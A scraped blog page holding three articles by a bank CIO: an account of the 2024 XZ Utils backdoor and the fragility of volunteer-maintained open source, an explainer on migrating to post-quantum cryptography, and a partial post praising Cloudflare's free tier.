On a quiet Friday evening in late March 2024, a Microsoft engineer named Andres Freund was running some routine benchmarks on his Debian development box when he noticed something strange. SSH logins were taking about 500 milliseconds longer than they should have. Failed login attempts from automated bots were chewing through an unusual amount of CPU. Most engineers would have shrugged it off. Freund did not. He pulled on the thread, and what he found on the other end was a meticulously planned, state sponsored backdoor that had been three years in the making, hidden inside a tiny compression library that almost nobody had ever heard of, but that sat underneath virtually everything on the internet.
If he had not noticed that half second delay, you might be reading about the worst cybersecurity breach in human history instead of this article.
This is the story of XZ Utils, CVE-2024-3094, and the terrifying fragility hiding in plain sight beneath the digital world.
1. Everything You Do Online Runs on Linux. Everything.
Before we get to the attack, you need to understand something that most people never think about. Almost the entire internet runs on Linux. Not Windows. Not macOS. Linux.
Over 96% of the top one million web servers on Earth run Linux. 92% of all virtual machines across AWS, Google Cloud, and Microsoft Azure run Linux. 100% of the world’s 500 most powerful supercomputers run Linux, and that has been the case since 2017. Android, which powers 85% of the world’s smartphones, is built on the Linux kernel. Every time you send a WhatsApp message, stream Netflix, make a bank transfer, check your email, order food, hail a ride, or scroll through social media, your request is almost certainly being processed by a Linux machine sitting in a data centre somewhere.
Linux is not a product. It is not a company. It started in 1991 when a Finnish university student named Linus Torvalds decided to write his own operating system kernel because he could not afford a UNIX license. The entire philosophy traces back even further, to the 1980s, when Richard Stallman got so frustrated that he could not modify proprietary printer software at MIT to fix a paper jam notification that he launched the Free Software movement and the GNU project. Torvalds wrote the kernel. The GNU project supplied the tools. Together they created a free, open operating system that anyone could inspect, modify, and redistribute.
That openness is why Linux won. It is also why what happened with XZ was possible.
2. The Most Important Software You Have Never Heard Of
XZ Utils is a compression library. It squeezes data to make files smaller. It has no website worth visiting, no marketing team, no venture capital, no logo designed by an agency. It does one thing, quietly and reliably, inside Linux systems across the planet.
You have almost certainly never typed “xz” into anything. But xz has been working for you every single day. It compresses software packages before they are downloaded to your devices. It compresses kernel images. It compresses the backups that keep your data safe. It sits in the dependency chains of tools that handle everything from web traffic to secure shell (SSH) connections, the protocol that system administrators use to remotely manage servers. If SSH is the front door to every Linux server on the internet, xz was sitting in the lock mechanism.
For years, XZ Utils was maintained by essentially one person: a Finnish developer named Lasse Collin. He worked on it in his spare time. There was no salary, no team, no corporate sponsor, no security audit budget. Just one person and an issue queue. This arrangement is completely normal in open source. It is also completely terrifying.
3. The Long Con: A Three Year Espionage Operation
In October 2021, a new GitHub account appeared under the name “Jia Tan.” The account began submitting patches to XZ Utils. Small things. Helpful things. An editor configuration file here, a minor code improvement there. The contributions were competent, consistent, and completely legitimate. Over the next year, Jia Tan built a genuine track record of useful work.
Then, starting in April 2022, something else began happening. A handful of previously unknown accounts began appearing on the XZ Utils mailing list, publicly pressuring Lasse Collin. An account calling itself “Jigar Kumar” complained that patches were languishing and declared that progress would not happen until there was a new maintainer. Another account, “Dennis Ens,” piled on. The messages were not overtly hostile but carried a steady drumbeat of criticism and implied urgency. When Collin responded by mentioning his own long term mental health struggles and limited bandwidth, one of the accounts replied with something that reads, in hindsight, like a calculated psychological strike: expressing sympathy about the mental health issues while suggesting that Collin should recognise his own limits and pass maintainership to someone else.
These were almost certainly sock puppet accounts. Security journalist Brian Krebs later noted that none of the email addresses associated with these accounts appeared anywhere else on the internet, including in massive data breach dumps. That kind of total digital absence across multiple identities is extraordinarily rare and strongly suggests a coordinated operation that was planned from the beginning.
Waiting in the wings with a spotless contribution history was Jia Tan.
Collin eventually relented. By 2023, Jia Tan had been elevated to co-maintainer with direct commit access and release signing privileges. In an email to the mailing list, Collin even noted that Jia Tan had been helping a lot off-list and was “practically a co-maintainer already.”
The trap had been set with extraordinary patience.
4. The Backdoor: Hiding a Master Key in Plain Sight
In February and March 2024, Jia Tan made the move. Two carefully crafted binary test files were committed to the XZ Utils repository. Binary files are not human readable, and storing them in a tests directory is completely normal for a compression library. Nobody would look twice at them. But those files were not test data. They were encrypted payloads.
Jia Tan then modified the build process, specifically a script called build-to-host.m4, so that during compilation the malicious payloads would be silently extracted and injected into the liblzma library. The modified build script was only present in the distributed tar archive, not in the Git source code that most reviewers would examine. This was deliberate misdirection, exploiting the gap between what developers see when they browse a repository and what actually gets compiled on a target system.
The injected code targeted OpenSSH’s authentication mechanism. Through a chain of library dependencies involving systemd and glibc, the backdoor hijacked a cryptographic function called RSA_public_decrypt, replacing it with malicious code. The effect was devastating in its elegance: anyone possessing a specific Ed448 private key could bypass SSH authentication entirely and execute arbitrary code on any affected machine.
In other words, the attacker would have had a master key to every compromised Linux server on Earth.
The vulnerability was assigned CVE-2024-3094 with a CVSS score of 10.0, the maximum possible severity rating. Computer scientist Alex Stamos called it what it was: potentially the most widespread and effective backdoor ever planted in any software product. Akamai’s security researchers noted it would have dwarfed the SolarWinds compromise. The attackers were within weeks of gaining immediate, silent access to hundreds of millions of machines running Fedora, Debian, Ubuntu, and other major distributions.
5. Saved by Half a Second
On 28 March 2024, Andres Freund, a Microsoft principal engineer who also happens to be a PostgreSQL developer and committer, was doing performance testing on a Debian Sid (unstable) installation. He noticed that SSH logins were consuming far more CPU than they should, and that even failing logins from automated bots were taking half a second longer than expected. Half a second – that is the margin by which the internet was saved from what would have been the most catastrophic supply chain attack in computing history.
Freund did not dismiss the anomaly. He investigated. He traced the CPU spike and the latency increase to the updated xz library. He dug into the build artefacts. He found the obfuscated injection code. And on 29 March 2024, he published his findings to the oss-security mailing list.
The response was immediate and global. Red Hat issued an urgent security alert. CISA published an advisory. GitHub suspended Jia Tan’s account and disabled the XZ Utils repository. Every major Linux distribution began emergency rollbacks. Canonical delayed the Ubuntu 24.04 LTS beta release by a full week and performed a complete binary rebuild of every package in the distribution as a precaution.
The tower shook, but it did not fall. And it did not fall because one engineer thought half a second of unexplained latency was worth investigating on a Friday evening.
6. The Uncomfortable Architecture of the Internet
There is a famous XKCD comic, number 2347, that shows the entire modern digital infrastructure as a towering stack of blocks, with one tiny block near the bottom labelled “a project some random person in Nebraska has been thanklessly maintaining since 2003.” It was a joke. Then XZ happened and it stopped being funny.
Here is what the actual dependency stack looks like in simplified form:
Each layer assumes the one below it is solid. The higher you build, the less anyone thinks about the foundations. Trillion dollar companies, national defence systems, hospital networks, stock exchanges, telecommunications grids, and critical infrastructure all sit on top of libraries maintained by volunteers who do the work because they care, not because anyone is paying them.
The XZ incident made this fragility impossible to ignore. A compression utility that most people have never heard of turned out to be sitting in the authentication pathway for remote access to Linux systems deployed globally. A single exhausted maintainer was socially engineered into handing the keys to an adversary. And the whole thing nearly went undetected.
7. The Ghost in the Machine
We still do not know who Jia Tan actually is. Analysis of commit timestamps suggests the attacker worked office hours in a UTC+2 or UTC+3 timezone. They worked through Lunar New Year but took off Eastern European holidays including Christmas and New Year. The name “Jia Tan” suggests East Asian origin, possibly Chinese or Hokkien, but the work pattern does not align with that geography. The operational security was exceptional. Every associated email address was created specifically for this campaign and has never appeared in any data breach. Every IP address was routed through proxies.
The consensus among security researchers, including teams at Kaspersky, SentinelOne, Akamai, and CrowdStrike, is that this was almost certainly a state sponsored operation. The patience (three years), the sophistication (the build system injection, the encrypted payloads hidden in test binaries, the deliberate gap between the Git source and the release tarball), and the multi-identity social engineering campaign all point to a resourced intelligence operation, not a lone actor.
SentinelOne’s analysis found evidence that further backdoors were being prepared. Jia Tan had also submitted a commit that quietly disabled Landlock, a Linux kernel sandboxing feature that restricts process privileges. That change was committed under Lasse Collin’s name, suggesting the commit metadata may have been forged. The XZ backdoor, in other words, was likely just the first move in a longer campaign.
8. The Billion Dollar Assumption
Here is the maths that should keep every CIO awake at night. Linux powers an estimated 90% of cloud infrastructure. The global cloud market generates hundreds of billions of dollars in annual revenue. Financial services, healthcare, telecommunications, logistics, defence, and government services all depend on it. SAP reports that 78.5% of its enterprise clients deploy on Linux. The Linux kernel itself contains over 34 million lines of code contributed by more than 11,000 developers across 1,780 organisations.
And yet, deep in the foundations of this ecosystem, critical libraries are maintained by individuals working in their spare time, with no security budget, no formal audit process, no staffing, and no funding proportional to the economic value being extracted from their work.
The companies building on top of this stack generate trillions in aggregate revenue. The people maintaining the foundations often receive nothing. The gap between the value extracted and the investment returned is not a rounding error. It is a structural vulnerability, and the XZ incident proved that adversaries know exactly how to exploit it.
9. Why This Will Happen Again
The uncomfortable truth is that the open source model that made the modern internet possible also created a systemic single point of failure that cannot be patched with a software update.
Social engineering attacks are getting more sophisticated. Large language models can now generate convincing commit histories, craft personalised pressure campaigns adapted to a maintainer’s psychological profile, and manage multiple fake identities simultaneously at a scale that would have been impossible even two years ago. What took the XZ attackers three years of patient reputation building could potentially be compressed into months using AI driven automation.
Meanwhile, the number of single maintainer critical projects has not decreased. The funding landscape has improved marginally through initiatives like the Open Source Security Foundation and GitHub Sponsors, but the investment remains a fraction of what the problem demands. The fundamental dynamic, companies worth billions depending on code maintained by individuals worth nothing to those companies, has not changed.
The XZ backdoor was caught because one curious engineer refused to ignore half a second of unexplained latency. That is not a security strategy. That is luck.
10. What Needs to Change
The Jenga tower still stands, but the XZ incident demonstrated exactly how fragile it is. The blocks at the bottom, the invisible libraries, the thankless utilities, the compression tools nobody has heard of, are the ones holding everything up. And they are precisely the ones receiving the least attention.
The solution is not to abandon open source. The solution is to treat it like the critical infrastructure it actually is. That means sustained corporate investment in the projects companies depend on, not charitable donations but genuine funded maintenance and security audit commitments. It means governance models that can detect and resist social engineering campaigns targeting burnt out solo maintainers. It means recognising that the person maintaining a compression library in their spare time is not a hobbyist. They are, whether they intended it or not, a load bearing wall in the architecture of the global economy.
Richard Stallman started this whole thing because he could not fix a printer. Half a century later, the philosophy of openness he championed underpins nearly every digital interaction on Earth. That is an extraordinary achievement. But the scale has outgrown the model, and the adversaries have noticed.
The next Andres Freund might not be running benchmarks on a Friday evening. The next half second might not get noticed.
11. References
Title / Description
Type
Link
he Internet Was Weeks Away From Disaster and No One Knew
Published on andrewbaker.ninja | Enterprise Architecture & Banking Technology
There is a quiet revolution happening in physics laboratories around the world, and most of the people who should be worried about it are not paying attention yet. That is about to change. Quantum computing is advancing faster than anyone predicted five years ago, and when it matures, it will shatter the encryption that protects virtually everything we hold dear in our digital lives, bank transactions, medical records, state secrets, and the messages you send to your family.
This is not science fiction. It is an engineering problem with a hard deadline, and the deadline is closer than you think.
1. Let’s Start at the Beginning: What Is Encryption, Really?
Before we can understand the quantum threat, we need a clear picture of what encryption is and why it works.
Imagine you want to send a secret message to a friend. You agree on a secret code beforehand, say, shift every letter three positions forward in the alphabet, so “A” becomes “D” and “B” becomes “E”. Anyone who intercepts the message sees gibberish. Only your friend, who knows the shift rule, can decode it. That is the essence of encryption.
Modern encryption works on the same principle but uses mathematics instead of alphabet shifts. Specifically, it relies on mathematical problems that are trivially easy to do in one direction but astronomically hard to reverse. The classic example is multiplication. Take two large prime numbers, say, a number with 300 digits, and multiply them together. Any computer can do that multiplication in a fraction of a second. But if I hand you only the result and ask you to find the original two prime numbers, even the most powerful computers on Earth today would take longer than the age of the universe to work it out.
That difficulty is the foundation of most encryption you encounter every day.
2. The Algorithms We Rely On Right Now
The encryption landscape today rests on a relatively small number of foundational algorithms. Understanding them at a high level matters, because each has a different vulnerability profile against quantum attacks.
RSA (named after its inventors Rivest, Shamir, and Adleman) is the workhorse of public key cryptography. When your browser shows a padlock icon and establishes a secure HTTPS connection, RSA is almost certainly involved. It protects the handshake that sets up the encrypted tunnel. RSA’s security rests entirely on that multiplication problem described above, the difficulty of factoring large numbers.
Elliptic Curve Cryptography (ECC) is a more modern and efficient cousin of RSA. It provides the same level of security with much shorter key lengths, making it preferred in environments where computing power is constrained, think mobile devices, payment terminals, and IoT sensors. ECC underpins much of the TLS encryption used in banking APIs and mobile applications today. Its security rests on a related mathematical problem called the discrete logarithm problem on elliptic curves.
AES (Advanced Encryption Standard) is a symmetric cipher, meaning both parties use the same key. It is used to encrypt the actual data once RSA or ECC has established a secure channel. AES protects data at rest, encrypted hard drives, database columns, archived files. It is widely considered robust and is used by governments and militaries worldwide.
SHA (Secure Hash Algorithm) is not an encryption algorithm in the traditional sense but a hashing function. It converts any input into a fixed length fingerprint. Banks use SHA to verify data integrity, if even a single byte of a transaction record changes, the hash changes completely. SHA also underpins digital signatures, which prove that a document has not been tampered with and that it came from a verified source.
The TLS protocol (Transport Layer Security), which you encounter every time you see “https” in your browser, combines these algorithms. RSA or ECC negotiates a shared secret, AES encrypts the actual data flowing back and forth, and SHA verifies integrity. It is an elegant system that has served us well for decades.
3. Enter the Quantum Computer
A classical computer, the one in your laptop, your phone, the servers running your bank, processes information as bits. Each bit is either a 0 or a 1. Every calculation is a sequence of operations on these binary values.
A quantum computer uses quantum bits, or qubits. And here is where physics gets strange. A qubit can be a 0, a 1, or, thanks to a quantum property called superposition, effectively both at the same time. Furthermore, qubits can be entangled, meaning the state of one qubit is instantly correlated with the state of another, regardless of physical distance. These properties allow a quantum computer to explore enormous numbers of possible solutions simultaneously rather than one at a time.
For most problems, this does not help much. But for certain specific mathematical problems, quantum computers are not just faster, they are exponentially faster in ways that completely break the difficulty assumptions that encryption relies on.
In 1994, a mathematician named Peter Shor published an algorithm, now called Shor’s Algorithm, that runs on a quantum computer and can factor large numbers exponentially faster than any classical computer. When a sufficiently powerful quantum computer running Shor’s Algorithm exists, RSA and ECC are broken. Not weakened. Broken. What currently takes longer than the age of the universe takes hours.
A second relevant algorithm, Grover’s Algorithm, provides a quadratic speedup for searching through unstructured data. This halves the effective key length of symmetric algorithms like AES. AES-128 becomes roughly as secure as a 64-bit key, which is crackable. AES-256 becomes roughly equivalent to AES-128, still acceptable for now, but the margin has shrunk significantly.
4. The “Harvest Now, Decrypt Later” Problem
Here is the part that should genuinely alarm every security professional and every executive responsible for sensitive data.
Quantum computers powerful enough to break RSA and ECC do not exist today. The current state of the art, systems from IBM, Google, and others, have hundreds to a few thousand qubits, but they are error prone and nowhere near the scale needed to run Shor’s Algorithm on real encryption keys. Most credible estimates put that capability somewhere between five and fifteen years away.
So why does this matter today?
Because sophisticated adversaries, nation states in particular, are almost certainly already collecting encrypted data they cannot currently read. They are storing it, waiting. When quantum capability arrives, they will decrypt years of harvested communications and data. This is not speculation. It is a rational strategy, and it costs almost nothing to execute given how cheap data storage has become.
Consider what that means in practice. A message encrypted and transmitted today that remains sensitive in ten years, say, a diplomatic cable, a long term business strategy, or a patient’s medical history, is already compromised in principle. The lock has been photographed. The key just has not been cut yet.
For banking, this has profound implications. Long term financial records, customer identification data, credit histories, and interbank settlement data could all be sitting in harvested caches waiting for quantum decryption.
5. Post Quantum Cryptography: The Response
The good news is that the mathematical and cryptographic community has known about this threat for decades and has been working on solutions. These solutions go by the name Post Quantum Cryptography (PQC), or sometimes Quantum Resistant Cryptography.
The approach is straightforward in concept: replace the mathematical problems that quantum computers can solve easily with different mathematical problems that quantum computers cannot. Three main families of problems have proven promising.
Lattice based cryptography relies on the difficulty of finding short vectors in high dimensional geometric structures called lattices. Imagine a crystal with billions of dimensions, finding a specific point within it is computationally intractable for both classical and quantum computers. Lattice problems have been studied for decades and have strong theoretical underpinnings. The leading PQC algorithms, CRYSTALS-Kyber for key encapsulation and CRYSTALS-Dilithium for digital signatures, are lattice based.
Hash based cryptography builds security on the same SHA hashing functions already in widespread use. SPHINCS+ is the primary hash based signature scheme. Its security assumptions are more conservative and better understood than newer approaches, which makes it attractive for high assurance applications.
Code based cryptography is based on the difficulty of decoding certain types of error correcting codes. This is one of the oldest areas of post quantum research, with the McEliece cryptosystem dating to 1978.
6. The NIST Standardisation Process
The United States National Institute of Standards and Technology (NIST) recognised the urgency of this problem in 2016 and launched a multi year global competition to evaluate and standardise post quantum algorithms. Cryptographers from around the world submitted candidates, and the process involved years of public scrutiny, attempted attacks, and mathematical analysis.
In August 2024, NIST published its first set of finalised PQC standards. These are not experimental proposals, they are production ready specifications intended for immediate adoption.
The three initial standards are ML-KEM (based on CRYSTALS-Kyber, used for key encapsulation, establishing shared secrets), ML-DSA (based on CRYSTALS-Dilithium, used for digital signatures), and SLH-DSA (based on SPHINCS+, a hash based signature alternative). A fourth standard, FN-DSA (based on Falcon, another lattice based scheme optimised for smaller signature sizes), is expected to be finalised shortly.
These standards represent the global consensus on what quantum resistant cryptography looks like for the next generation of secure systems.
7. What This Means for Your Technology Stack
This is where things get very concrete and very expensive. The encryption algorithms described above are not isolated modules sitting in one place. They are woven into virtually every layer of modern technology infrastructure, and ripping them out and replacing them is a massive undertaking.
7.1 Data in Flight
Every TLS connection uses RSA or ECC for its handshake. That covers your web applications, your APIs, your service to service communication inside microservice architectures, your database connections, your message brokers, your load balancers, and your VPNs. All of it needs to be upgraded to support hybrid key exchange, a transitional approach that combines a classical algorithm with a post quantum one, providing protection even if one is compromised.
Modern versions of TLS (1.3) and the underlying libraries, OpenSSL, BoringSSL, and similar, are already adding support for post quantum key exchange. But every system that terminates TLS needs to be upgraded: web servers, API gateways, CDN edge nodes, load balancers, network appliances, HSMs (Hardware Security Modules), and more. Many of these have long hardware refresh cycles and embedded firmware that is difficult to update.
7.2 Data at Rest
AES-256 remains acceptable against quantum attacks, Grover’s Algorithm halves its strength, but 256-bit strength halved is still 128-bit equivalent strength, which is currently considered secure. The immediate priority for data at rest is therefore ensuring you are using AES-256 everywhere, not AES-128. Many legacy systems still use AES-128 or, worse, older algorithms like 3DES, which need to be remediated regardless of quantum concerns.
However, the key management infrastructure protecting your AES keys is another matter entirely. Those keys are typically encrypted or exchanged using RSA or ECC. If your key management system, whether that is a cloud KMS service, an on premise HSM cluster, or a custom solution, uses classical public key cryptography to protect AES keys, the chain of trust is broken at the key management layer even if the data encryption itself is quantum resistant. Key management infrastructure needs to be upgraded to use post quantum algorithms for key wrapping and key exchange.
7.3 Digital Certificates and PKI
Public Key Infrastructure (PKI) is the system of trust that underpins digital certificates, the mechanism that allows your browser to verify it is talking to your real bank and not an impersonator. Every certificate in use today is signed using RSA or ECC. Certificate authorities, certificate revocation mechanisms, OCSP responders, and the trust stores built into every operating system and browser all need to be migrated to post quantum signature schemes.
This is complicated by the fact that certificates have expiry dates measured in months to a few years, so the migration can be staged, but the root certificates at the top of the trust hierarchy are long lived and need early attention. Browser vendors and operating system providers are already working on this, but enterprise PKI environments, which often include private certificate authorities for internal services, need their own migration plans.
7.4 Secure Shell (SSH)
SSH is the protocol used to securely administer servers and network infrastructure. It uses RSA, ECC, and related algorithms for both host key authentication and user authentication. Every SSH server and client, which means virtually every Linux server, network device, and cloud instance, will need updated key types and algorithm preferences. The OpenSSH project has already added experimental support for post quantum key exchange, but enterprise environments need planned migration paths.
7.5 Code Signing and Software Supply Chain
Software companies sign their releases digitally so that operating systems and update mechanisms can verify that the software you are installing is genuine and has not been tampered with. These signatures use, you guessed it, RSA or ECC. A quantum capable adversary could forge signatures on malicious software. Migration to post quantum signature schemes for code signing is critical for long term software supply chain security.
7.6 Hardware Security Modules
HSMs are specialised hardware devices designed to perform cryptographic operations and store keys securely. They are the backbone of payment processing, certificate authorities, and high assurance key management. HSMs have long lifecycles, five to ten years is common, and many current generation devices have limited or no support for post quantum algorithms. Organisations need to inventory their HSMs and plan replacements or firmware upgrades accordingly. This is not cheap, and procurement lead times for specialised hardware can be long.
7.7 Internet of Things and Embedded Systems
Perhaps the most difficult part of the migration is embedded systems and IoT devices. Payment terminals, ATMs, smart meters, industrial control systems, and connected devices of every description run firmware with hardcoded cryptographic algorithms. Many cannot be updated remotely. Some cannot be updated at all. For the banking sector specifically, the number of deployed payment terminals and ATMs globally is enormous, and the logistics and cost of replacing or updating them is staggering.
8. The Banking Sector: A Special Case
Banks sit at the intersection of almost every dimension of this problem. They hold extraordinarily sensitive data about their customers, financial histories, identity documents, behavioural patterns, and they are governed by strict regulatory frameworks that mandate specific security controls. They operate complex ecosystems involving core banking systems that are decades old, modern digital banking platforms, real time payment rails, card networks, and a vast web of third party integrations.
The interbank settlement systems, the infrastructure through which banks settle obligations with each other, are critical national infrastructure. In South Africa, systems like SAMOS (the South African Multiple Option Settlement system) and the various payment clearing mechanisms operated by BankservAfrica represent the plumbing of the financial system. The cryptographic protections on these systems need to be quantum resistant before quantum threats materialise.
SWIFT, the global interbank messaging network, has already published guidance on post quantum migration timelines and is working on updates to its protocols. Card schemes including Visa and Mastercard are engaged in similar efforts. The PCI-DSS standard, which governs payment card security, will inevitably incorporate post quantum requirements in future versions.
Regulatory bodies globally are beginning to take notice. The Financial Stability Board has flagged quantum computing as a systemic risk. Central banks and prudential regulators are starting to ask questions about quantum readiness in their supervisory processes. Boards and executives who are not yet thinking about this should be.
9. Crypto Agility: The Architectural Principle That Changes Everything
One of the most important lessons from the post quantum migration is not specific to quantum at all. It is about a concept called crypto agility: designing systems so that cryptographic algorithms can be swapped out without fundamental architectural change.
Most systems built over the past twenty years hardcode specific algorithms deep in their implementations. Changing the algorithm means changing the code, testing the change, deploying it, a significant engineering effort multiplied across every system in the estate. If the entire industry had adopted crypto agile architectures from the beginning, the quantum migration would be an operational challenge rather than an existential one.
Going forward, every new system should be built with crypto agility as a first class requirement. Algorithm selection should be a configuration concern, not a code concern. Cryptographic operations should be encapsulated behind well defined interfaces that can be backed by different implementations. Key management systems should be designed to support multiple algorithm types simultaneously.
10. What Should You Be Doing Right Now?
The migration to post quantum cryptography is not a project that can be started when quantum computers become a near term reality. By then it will be too late. The harvest now, decrypt later threat means the window for protecting long lived sensitive data has already partially closed.
A practical roadmap looks something like this.
Start with a cryptographic inventory. You cannot protect what you cannot see. Every system, every data store, every API endpoint, every certificate needs to be catalogued with the algorithms it uses. This is tedious work, but it is foundational. Many organisations are surprised to discover how much classical cryptography is buried in unexpected places, legacy batch processes, backup systems, monitoring agents, and logging pipelines.
Assess the sensitivity and longevity of your data. Not all data needs the same level of urgency. Data that will be public in five years and is not sensitive today is a lower priority. Data that must remain confidential for twenty years, long term contracts, personal identification records, health records, needs to be protected now with quantum resistant methods or at minimum with hybrid approaches that add a post quantum layer on top of classical encryption.
Begin hybrid deployments for data in flight. Major cloud providers and CDN vendors already support hybrid key exchange in TLS. Enabling this configuration for internet facing services is a relatively low risk first step that provides immediate protection against harvest now, decrypt later attacks.
Plan your PKI migration. Identify your certificate authorities, understand your certificate inventory, and develop a migration plan for moving to post quantum signing algorithms. This is a long runway project given the dependencies on browser and OS trust stores, but the planning needs to start now.
Engage your hardware vendors. Ask your HSM vendors, network appliance vendors, and embedded system suppliers about their post quantum roadmaps. If they do not have credible answers, that should factor into your procurement decisions.
Build crypto agility into new systems. Every greenfield project should be designed from the outset to support algorithm agility. This is the easiest time to get it right.
Train your teams. Post quantum cryptography involves concepts that are unfamiliar to most engineers and architects. Building internal capability now pays dividends throughout the migration.
11. The Horizon
Quantum computing and post quantum cryptography are one of those rare convergences where the threat and the defence are both genuinely new. The mathematics is settled, we know what is broken and we know what the replacements are. What remains is the enormous operational challenge of migrating the world’s technology infrastructure.
The organisations that treat this as an urgent priority today will be in a strong position as quantum capability advances. Those that wait for the threat to become immediate will face a chaotic scramble to protect data that is already potentially compromised.
We are not at the end of the encryption era. We are at a transition point, and the post quantum era is already beginning. The NIST standards are published. The algorithms are ready. The only question is how quickly we can deploy them.
The padlock on your digital life is being changed. The question for every organisation is whether they will do it on their own terms and timeline, or be forced to do it in a panic when the quantum threat arrives.
Andrew Baker is Chief Information Officer at Capitec Bank. He writes about enterprise architecture, cloud technology, and the future of banking at andrewbaker.ninja.
There is a truth that most technology vendors either do not understand or choose to ignore: the best sales pitch you will ever make is letting someone use your product for free. Not a watered-down demo, not a 14-day trial that expires before anyone has figured out the interface, but a genuinely generous free tier that lets people build real things and solve real problems. Cloudflare understands this better than almost anyone in the industry right now, and it has made me a genuine advocate in a way that no amount of marketing spend ever could.
1. How I Found Cloudflare and Almost Lost It
My journey with Cloudflare did not begin with enthusiasm. It began at Capitec, where I was evaluating infrastructure and security platforms at institutional scale. My initial view of Cloudflare was limited: it was a CDN with an API gateway capability, useful, but not architecturally differentiated in any meaningful way from competing options. My awareness of what genuinely set it apart was low.
The concerns I had at that stage were squarely enterprise concerns. The lack of private peering between Cloudflare and AWS in South Africa was a meaningful issue for Capitec specifically. For a major retail bank operating in this market, network latency and peering and routing issues are not abstract considerations. They are hard requirements. The absence of a direct peering arrangement had me questioning whether Cloudflare could credibly serve the needs of a bank with millions of active customers.
Then came a series of outages in 2025. Any one of those incidents in isolation might have been forgivable, but cumulatively they put Cloudflare in a difficult position. For a platform whose core value proposition is reliability and availability, sustained turbulence shakes confidence.
What changed my perspective was not a sales conversation or an analyst briefing. It was personal experimentation. I started using Cloudflare for andrewbaker.ninja, my personal blog, after joining Capitec. That hands-on use opened up a completely different view of the platform. What I had evaluated as a CDN with an API gateway was actually something far more capable. I discovered R2, Cloudflare’s object storage offering. I worked through Workers in depth. I started building real functionality at the edge, not just routing traffic through it. Most significantly, our team began using Cloudflare Workers to create custom malware signals and block traffic based on behavioural patterns, turning what I had thought of as a passive network layer into an active security enforcement point.
That is the moment the evaluation changed. The peering concerns and the stability questions remained live issues, but I now had genuine product depth that allowed me to weigh them against a much clearer picture of Cloudflare’s architectural differentiation. That picture came entirely from free tier experimentation on a personal blog. It could not have come from a sales deck.
2. What Cloudflare Actually Gives You for Free
The Cloudflare free tier is, frankly, extraordinary. When I first started using it for andrewbaker.ninja, I expected the usual pattern: enough capability to see the shape of the product, but with enough gates and limits to push you toward a paid plan. What I found instead was a comprehensive platform that covers almost every dimension of modern web security and performance at zero cost.
2.1 Security and Performance at the Edge
The foundation of the free tier is unmetered DDoS mitigation. Not capped, not throttled after a threshold, unmetered. For a personal blog or small business site, volumetric attacks are existential threats, and the fact that Cloudflare absorbs them at no cost is a remarkable statement of confidence in their own network scale. Sitting on top of that is a global CDN spanning over 300 cities, with free tier users on the same edge infrastructure as enterprise customers. SSL is automated, free, and renews without any manual intervention, making the secure default the effortless default. Five managed WAF rules covering the most critical OWASP categories are included, along with basic bot protection that handles the constant noise floor of scrapers, credential stuffers, and scanning bots that any public site attracts.
Caching deserves particular attention because for anyone running on a low end AWS instance type, and most personal blogs do exactly that, it is not a nice to have. It is life or death for the origin server. A t3.micro or t4g.small running WordPress has a hard ceiling. Under normal traffic patterns it holds up, but a post shared on LinkedIn with any momentum or picked up by a newsletter will send concurrent requests that a small instance simply cannot absorb. With Cloudflare caching absorbing the majority of that traffic, the origin barely notices the spike. I have watched this play out against andrewbaker.ninja more than once. The cache hit ratio in the analytics dashboard tells the story clearly: the origin handles a fraction of total requests while Cloudflare absorbs the rest. That is an availability and cost story simultaneously. Cache rules, custom TTLs, per-URL purging, and intelligent handling of query strings and cookies are all available on the free tier, giving you a degree of control that is not normally associated with a free offering.
2.2 Developer Capability and Operational Visibility
Beyond security and performance, the free tier extends into territory that genuinely surprises. Workers gives you serverless compute at the edge with 100,000 requests per day included, which is more than enough to build meaningful functionality: request transformation, custom authentication flows, A/B testing, and API proxying. In our case, it became a platform for building custom malware detection signals and traffic blocking logic that goes well beyond what a conventional WAF configuration could achieve. Cloudflare Pages adds free static site hosting with unlimited bandwidth and up to 500 builds per month, competitive with the best JAMstack platforms. DNS management sits on infrastructure widely regarded as the fastest authoritative DNS in the world, with DNSSEC and a clean management interface included at no cost.
The analytics layer is where Cloudflare makes a particularly interesting choice. Rather than gating visibility behind paid plans to obscure the value being delivered, the free tier shows you everything: requests, bandwidth, cache hit ratios, threats blocked by type, geographic traffic distribution, and real user Web Vitals data including Largest Contentful Paint and Cumulative Layout Shift from actual visitor sessions. For andrewbaker.ninja, the geographic breakdown alone was genuinely new information that shaped content decisions. Seeing threats blocked in real time makes the protection layer concrete rather than theoretical. Zero Trust Access rounds out the free offering with up to 50 users, giving hands-on experience with a ZTNA model that enterprise vendors charge significant per-user premiums to access.
One area where I would encourage Cloudflare to go further is 404 error tracking, which currently sits behind paid plans. A limited version tracking errors for just a handful of pages would cost them very little while giving free tier users a direct experience of the capability. The broader principle I would advocate is that every service in the Cloudflare catalogue should have at least a small free window. Exposure drives understanding, understanding drives advocacy, and advocacy drives enterprise pipeline far more reliably than any campaign.
3. The Strategic Value of Free Tier as a Leadership Development Tool
Let me be direct about what actually happened here. Cloudflare was already on my radar at Capitec, evaluated cautiously and with real reservations. What the free tier did was deepen my product knowledge far beyond what any enterprise evaluation process produces. I moved from understanding Cloudflare as a CDN with an API gateway to understanding it as a programmable edge platform with genuine security enforcement capability. That shift happened entirely through personal experimentation, at zero cost to Cloudflare beyond the infrastructure they were already running.
No sales team call produced that outcome. No analyst briefing, no conference sponsorship, no whitepaper. A free tier account for a personal blog did.
This is not a coincidence or a lucky edge case. It is the mechanism by which free tier compounds in value over time in ways that are almost impossible to model but entirely real. The person experimenting with your product on a side project today is accumulating product knowledge that travels with them across every context in which they operate, personal and professional simultaneously. When that person holds senior leadership responsibility, the intuitions built through free tier experimentation inform how they frame requirements, assess vendor claims, and evaluate architectural trade-offs. Crucially, that knowledge also provides resilience when a platform goes through a difficult period. I stayed with Cloudflare through the 2025 stability issues not because of a reassuring account manager call but because my own hands-on depth gave me enough architectural confidence to make an informed judgment rather than a reactive one.
The same pattern holds with AWS. My understanding of AWS architecture was built significantly through free tier experimentation. The 12 months of free tier access that AWS provides across a substantial catalogue of services is one of the smartest investments they have made in their developer ecosystem. My seven AWS certifications represent formal validation of knowledge that was built largely through hands-on experimentation the free tier enabled. When I evaluate AWS proposals at Capitec or advocate for specific AWS architectural patterns, that credibility traces back to free tier experience. No marketing budget produces that outcome.
Free tier products are, in effect, a leadership development programme that technology vendors run at their own expense. Every future CIO, CTO, or technology decision maker working their way up through an organisation is building instincts and preferences right now through the products they can access and experiment with freely. The vendors who understand this invest in those experiences. The vendors who do not are optimising for short-term revenue extraction at the cost of long-term pipeline development.
4. The Slack Cautionary Tale
Slack represents the opposite lesson, and it is worth examining honestly.
